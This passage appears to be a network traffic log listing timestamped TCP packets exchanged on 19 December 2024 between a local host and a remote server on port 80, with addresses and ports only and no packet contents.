Dec 19, 2024 08:47:36.579181910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.579530001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.579678059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.579962015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.580231905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.580287933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.580818892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.580964088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.581475019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.581656933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.582015038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.582998991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.583010912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.583117962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.584036112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.584048033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.584115028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.584393978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.584408045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.584553957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.584855080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.585170031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.585486889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.585527897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.585913897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.586328030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.586378098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.586579084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.587107897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.587194920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.587330103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.587379932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.587887049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.588093996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.588201046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.588713884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.588864088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.588939905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.589452982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.589764118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.589864016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.590301037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.590461016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.590540886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.591211081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.591878891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.592360020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.592428923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.592605114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.593888998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.593903065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.593976974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.593976974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.594619036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.594631910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.594748974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.595295906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.595316887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.595650911 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.596106052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.596121073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.596752882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.596765995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.596820116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.596821070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.597415924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.653430939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.747236967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.747473001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.747548103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.747749090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.748153925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.748442888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.748517990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.748786926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.749174118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.749227047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.749478102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.749958038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.750056982 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.750360966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.750435114 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.750780106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.750966072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.751013041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.751533985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.752047062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.752104998 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.752322912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.752722025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.753110886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.753154039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.753403902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.753915071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.753968000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.754190922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.754276037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.754714966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.755002022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.755099058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.755487919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.756156921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.756253958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.756299973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.756318092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.756475925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.757344007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.757682085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.757992029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.758049965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.758405924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.758699894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.758902073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.758909941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.759469032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.759532928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.759708881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.759768963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.760243893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.760442019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.760497093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.761033058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.761229038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.761396885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.761858940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.762155056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.762403011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.762589931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.762794018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.763582945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.763600111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.763717890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.763717890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.764251947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.764395952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.764483929 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.765011072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.765261889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.765372992 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.765801907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.766102076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.766225100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.766603947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.766772032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.767391920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.767467976 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.767623901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.768285036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.768352985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.768433094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.768522978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.768982887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.769218922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.769304037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.769826889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.770131111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.770231009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.770535946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.770901918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.771430016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.771445990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.771497011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.771589041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.772106886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.772533894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.772655010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.773008108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.773111105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.773165941 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.773705959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.773948908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.774061918 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.774561882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.774868965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.775124073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.775381088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.775863886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.776189089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.776205063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.776346922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.776901007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.777198076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.777293921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.777656078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.778042078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.778103113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.778492928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.778759003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.779228926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.779308081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.780090094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.780106068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.780154943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.780546904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.780670881 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.780896902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.781250000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.781297922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.782663107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.782680988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.782953978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.783504009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.783520937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.783628941 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.784163952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.784181118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.784787893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.784804106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.784857988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.784857988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.785463095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.785480022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.785573959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.786144018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.786160946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.786252975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.786819935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.787189007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.787204027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.787293911 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.787858963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.788248062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.788264036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.788292885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.788307905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.788863897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.840953112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.946284056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.946475029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.946597099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.946794033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.947177887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.947232008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.947505951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.947871923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.947947025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.948379993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.948642969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.949034929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.949103117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.949242115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.949428082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.949827909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.950063944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.950171947 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.950617075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.951076984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.951152086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.951699972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.952027082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.952712059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.952817917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.953002930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.953478098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.953545094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.953751087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.953808069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.954205990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.954493046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.954561949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.954794884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.955007076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.955585003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.955607891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.955693007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.956199884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.956257105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.956732035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.956954002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.957062960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.957253933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.957465887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.957736015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.958647966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.958664894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.958709002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.958921909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.959336996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.959387064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.959650993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.960125923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.960194111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.960355043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.960433960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.960927963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.961136103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.961257935 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.961692095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.961910009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.961957932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.962582111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.962857962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.963356018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.963398933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.963504076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.964097977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.964149952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.964314938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.964359999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.964867115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.965102911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.965173960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.965783119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.966223955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.966433048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.966489077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.966896057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.967241049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.967323065 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.967758894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.967808008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.968077898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.968301058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.968405008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.969014883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.969657898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.969681978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.969733000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.970017910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.970407009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.970462084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.970679998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.970721960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.971693039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.972044945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.972062111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.972101927 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.972356081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.972470999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.972794056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.973058939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.973117113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.973720074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.974080086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.974545956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.974594116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.974611044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.974663973 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.975183964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.975476027 CET	80	49707	194.87.47.113	192.168.2.7
